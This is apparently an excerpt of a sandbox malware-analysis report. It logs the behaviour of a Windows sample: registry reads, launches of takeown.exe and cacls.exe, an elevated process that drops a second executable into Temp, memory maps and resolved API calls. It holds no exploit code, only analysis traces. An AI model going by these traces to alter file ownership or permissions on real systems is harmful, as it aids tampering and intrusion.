| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x524, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x9f8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Genko_1.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Genko_1.jtp" |
|
1 |
Process #222: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #222 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:39, Reason: Child Process |
| Unmonitor | End Time: 00:03:49, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc40 |
| Parent PID | 0x4e8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F18
0x
F6C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x01daffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
